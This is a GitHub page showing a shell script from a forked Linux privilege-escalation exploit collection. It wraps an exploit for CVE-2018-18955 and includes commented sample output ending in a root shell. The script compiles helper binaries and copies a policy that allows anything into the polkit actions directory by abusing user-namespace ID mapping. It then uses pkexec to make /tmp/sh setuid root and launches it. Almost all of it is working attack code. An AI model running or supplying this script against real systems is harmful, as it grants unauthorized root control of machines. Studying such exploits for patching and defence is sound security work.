forked from JlSakuya/Linux-Privilege-Escalation-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.polkit.sh
134 lines (110 loc) · 3.14 KB
/
exploit.polkit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/bin/sh
# wrapper for Jann Horn's exploit for CVE-2018-18955
# uses polkit technique
# ---
# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh
# [*] Compiling...
# [*] Creating /usr/share/polkit-1/actions/subuid.policy...
# [.] starting
# [.] setting up namespace
# [~] done, namespace sandbox set up
# [.] mapping subordinate ids
# [.] subuid: 165536
# [.] subgid: 165536
# [~] done, mapped subordinate ids
# [.] executing subshell
# [*] Launching pkexec...
# [+] Success:
# -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh
# [*] Cleaning up...
# [*] Launching root shell: /tmp/sh
# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
# uid=0(root) gid=0(root) groups=0(root),1001(test)
rootshell="/tmp/sh"
policy="subuid.policy"
command_exists() {
command -v "${1}" >/dev/null 2>/dev/null
}
if ! command_exists /usr/bin/pkexec; then
echo '[-] pkexec is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
echo 'Using precompiled binary'
cp bin/subuid_shell .
if [ $? -ne 0 ]
then
echo "Could not copy precompiled binary"
exit 1
fi
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
echo 'Using precompiled binary'
cp bin/subshell .
if [ $? -ne 0 ]
then
echo "Could not copy precompiled binary"
exit 1
fi
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
echo 'Using precompiled binary'
cp bin/rootshell "${rootshell}"
if [ $? -ne 0 ]
then
echo "Could not copy rootshell to '${rootshell}'"
exit 1
fi
fi
echo "[*] Creating /usr/share/polkit-1/actions/${policy}..."
echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE policyconfig PUBLIC
"-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
"http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">
<policyconfig>
<action id="org.freedesktop.policykit.exec">
<defaults>
<allow_any>yes</allow_any>
<allow_inactive>yes</allow_inactive>
<allow_active>yes</allow_active>
</defaults>
</action>
</policyconfig>' > "${policy}"
echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell
if ! test -r "/usr/share/polkit-1/actions/${policy}"; then
echo '[-] Failed'
/bin/rm "${rootshell}"
exit 1
fi
echo "[*] Launching pkexec..."
/usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}"
if ! test -u "${rootshell}"; then
echo '[-] Failed'
/bin/rm "${rootshell}"
exit 1
fi
echo '[+] Success:'
/bin/ls -la "${rootshell}"
echo '[*] Cleaning up...'
/bin/rm subuid_shell
/bin/rm subshell
/bin/rm "${policy}"
echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell
echo "[*] Launching root shell: ${rootshell}"
$rootshell